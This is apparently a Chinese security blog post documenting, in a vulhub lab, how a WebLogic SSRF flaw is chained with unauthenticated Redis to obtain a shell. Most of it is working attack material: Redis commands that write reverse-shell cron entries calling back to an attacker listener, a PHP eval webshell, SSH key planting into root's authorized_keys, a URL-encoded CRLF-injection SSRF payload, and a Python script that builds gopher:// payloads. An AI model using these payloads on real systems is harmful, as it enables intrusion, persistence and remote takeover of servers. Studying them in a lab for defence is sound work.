Weblogic ssrf+Redis Getshell学习

redis能够写文件,因此可以做到写ssh的秘钥,写webshell,写计划任务等操作

而ssrf可以访问内网的redis,那么就可以控制内网的redis进行上面的操作了

镜像来源vulhub:https://github.com/vulhub/vulhub/tree/master/weblogic/ssrf

redis写shell

在默认情况下redis是没有密码的,也就是所谓的未授权访问

首先要了解下需要使用到的redis的基本命令

config set dir '/xxx/xx'			//指定数据库文件的目录
config set dbfilename 'xxx'			//指定数据库文件的名字
set x 'xxxxx'						//操作会记录到数据库中
save								//保存配置

因为目录和数据名可以随便起,所以起名为xxx.php也合法的,再加上操作中可写一句话的内容,因此可以做到写webshell的作用,因为目录也是随意的因此写计划任务到计划任务文件也是getshell的一种思路,最后写ssh的秘钥可以让ssh连接不用通过密码就能连接的手段

环境配置

这是redis的docker镜像的ip
Weblogic ssrf+Redis Getshell学习

这是我ubuntu宿主机的ip

Weblogic ssrf+Redis Getshell学习

计划任务getshell

计划任务的文件有2个/etc/crontab/var/spool/cron/root

第一个是所用用户的计划任务都可以写在这,第二个是root用户的计划任务会写在这,如果其他用户比如apache则是/var/spool/cron/apache

计划任务的格式如下

*/1 * * * * root bash -i >& /dev/tcp/ip/port 0>&1

这样没1分钟就会反弹一次shell

set 1 "\n\n*\\1 * * * * root bash -i >& /dev/tcp/172.17.0.1/2333 0>&1\n\n"
config set dir /etc/
config set dbfilename crontab
save

开始测试向/etc/crontab中写计划任务,成功写入了(前一行是我之前写的 少转义了个\,导致 *1之间缺个\,但好像没有影响orz我忘了计划任务具体的了)

Weblogic ssrf+Redis Getshell学习

接下来ubuntu监听2333端口,获得shell

Weblogic ssrf+Redis Getshell学习

接下来同理向/var/spool/cron/root中写入计划任务

set 1 "\n\n*\\1 * * * * bash -i >& /dev/tcp/172.17.0.1/2333 0>&1\n\n"
config set dir /var/spool/cron/
config set dbfilename root
save

成功写入,这里注意计划任务中少了 root 这个用户,和/etc/crontab 的payload稍微有点区别

Weblogic ssrf+Redis Getshell学习

弹到shell,如果计划任务多加了用户 root的话,会接到信息,但是会报错退出

Weblogic ssrf+Redis Getshell学习

直接写webshell

至于写webshell,因为我redis镜像没有web服务,所以这里就直接给出要执行的命令,其实也和上面差不多

set 1 "<?php eval($_POST[1]); ?>"
config set dir /var/www/html/
config set dbfilename shell.php
save

写ssh

这里我模拟个场景

宿主机存在redis,存在ssh,最后用ssh连本机的root

首先生成秘钥和公钥

ssh-keygen -t rsa
//它会提示输入密钥和公钥的名字,我这里叫./id_rsa
//然后会设置密码,我这里设置的123456

Weblogic ssrf+Redis Getshell学习

然后把公钥写入一个txt文件中

(echo -e "\n\n";cat id_rsa.pub;echo -e "\n\n") > hack.txt

最后就是将内容通过redis保存到服务器了

cat hack.txt | redis-cli -h 172.18.0.2 -x set xxx
//之后进入数据库即可
redis-cli
config set dir /root/.ssh/
config set dbfilename "authorized_keys"
save

我这里因为环境的问题没有成功,留个坑之后补一下(不知道为啥ubuntu官方的docker镜像启动不起来)

连接ssh,使用秘钥即可

ssh -i id_rsa root@127.0.0.1

weblogic ssrf配合redis,getshell漏洞

拿的shell是redis的shell,因为内网是没法直接访问的,但是内网可以访问到攻击机的情况就可以使用反向代理的方式拿到shell,也就是从redis服务器向攻击机发送连接请求

验证ssrf,访问内网的redis

weblogic的漏洞页面如下

Weblogic ssrf+Redis Getshell学习

触发ssrf的参数

Weblogic ssrf+Redis Getshell学习

之后修改成其他端口试试,返回不一样

Weblogic ssrf+Redis Getshell学习

因为是专门的docker镜像就只有个7001开着的

然后咱已知道内网那台redis的ip了(在实际中可以写个python脚本扫描下内网的机子)

比如内网不存在某个ip的电脑存活时会返回

Weblogic ssrf+Redis Getshell学习

有存活的时候会返回

Weblogic ssrf+Redis Getshell学习

端口存在的的时候返回又是不同的

Weblogic ssrf+Redis Getshell学习

进行反弹shell的命令发送

mi0


set 1 "\n\n\n\n*\\1 * * * * root bash -i >& /dev/tcp/172.17.0.1/2333 0>&1\n\n\n\n"
config set dir /etc/
config set dbfilename crontab
save


mi0

上下这个字符任意即可,因为这个weblogic的ssrf它存在能用%0a,%0d换行,所以上面脚本进行url编码后得到以下内容

mi0%0D%0A%0D%0Aset%201%20%22%5Cn%5Cn%5Cn%5Cn*%5C%5C1%20*%20*%20*%20*%20root%20bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F172.17.0.1%2F2333%200%3E%261%5Cn%5Cn%5Cn%5Cn%22%0D%0Aconfig%20set%20dir%20%2Fetc%2F%0D%0Aconfig%20set%20dbfilename%20crontab%0D%0Asave%0D%0A%0D%0Ami0

成功的写入,这里稍微注意下,url编码如果全编码反而写入不了

Weblogic ssrf+Redis Getshell学习

成功拿到redis的shell

Weblogic ssrf+Redis Getshell学习

利用gopher协议

首先把命令执行代码写成bash.sh脚本

echo -e "\n\n\n*/1 * * * * bash -i >& /dev/tcp/127.0.0.1/2333 0>&1\n\n\n"|redis-cli -h $1 -p $2 -x set 1
redis-cli -h $1 -p $2 config set dir /var/spool/cron/
redis-cli -h $1 -p $2 config set dbfilename root
redis-cli -h $1 -p $2 save
redis-cli -h $1 -p $2 quit

然后进行监听socat,获得发送的数据

socat -v tcp-listen:4444,fork tcp-connect:localhost:6379

输入后就开始监听,再起个shell运行刚刚的脚本

bash shell.sh 127.0.0.1 4444

会捕获到信息,但是我是ubuntu18.04,环境可能不同(ubuntu没法用redis写计划任务)

这里就贴别人抓到的信息

> 2017/10/11 01:24:52.432446  length=85 from=0 to=84
*3\r
$3\r
set\r
$1\r
1\r
$58\r



*/1 * * * * bash -i >& /dev/tcp/127.0.0.1/2333 0>&1



\r
< 2017/10/11 01:24:52.432685  length=5 from=0 to=4
+OK\r
> 2017/10/11 01:24:52.435153  length=57 from=0 to=56
*4\r
$6\r
config\r
$3\r
set\r
$3\r
dir\r
$16\r
/var/spool/cron/\r
< 2017/10/11 01:24:52.435332  length=5 from=0 to=4
+OK\r
> 2017/10/11 01:24:52.437594  length=52 from=0 to=51
*4\r
$6\r
config\r
$3\r
set\r
$10\r
dbfilename\r
$4\r
root\r
< 2017/10/11 01:24:52.437760  length=5 from=0 to=4
+OK\r
> 2017/10/11 01:24:52.439943  length=14 from=0 to=13
*1\r
$4\r
save\r
< 2017/10/11 01:24:52.443318  length=5 from=0 to=4
+OK\r
> 2017/10/11 01:24:52.446034  length=14 from=0 to=13
*1\r
$4\r
quit\r
< 2017/10/11 01:24:52.446148  length=5 from=0 to=4
+OK\r

如果要改的话要修改这2个地方

Weblogic ssrf+Redis Getshell学习

之后使用脚本将其转换为gopher协议的格式

#coding: utf-8
#author: JoyChou
import sys

exp = ''

with open(sys.argv[1]) as f:
    for line in f.readlines():
        if line[0] in '><+':
            continue
        # 判断倒数第2、3字符串是否为\r
        elif line[-3:-1] == r'\r':
            # 如果该行只有\r,将\r替换成%0a%0d%0a
            if len(line) == 3:
                exp = exp + '%0a%0d%0a'
            else:
                line = line.replace(r'\r', '%0d%0a')
                # 去掉最后的换行符
                line = line.replace('\n', '')
                exp = exp + line
        # 判断是否是空行,空行替换为%0a
        elif line == '\x0a':
            exp = exp + '%0a'
        else:
            line = line.replace('\n', '')
            exp = exp + line
print exp

之后利用即可

gopher://ip:6379/_payload

参考链接

https://joychou.org/web/phpssrf.html

https://blog.csdn.net/bwlab/article/details/54138223

http://www.lichengxiao.cn/17.html

https://github.com/vulhub/vulhub/tree/master/weblogic/ssrf

上一篇:记录一次游戏私服getshell过程


下一篇:getshell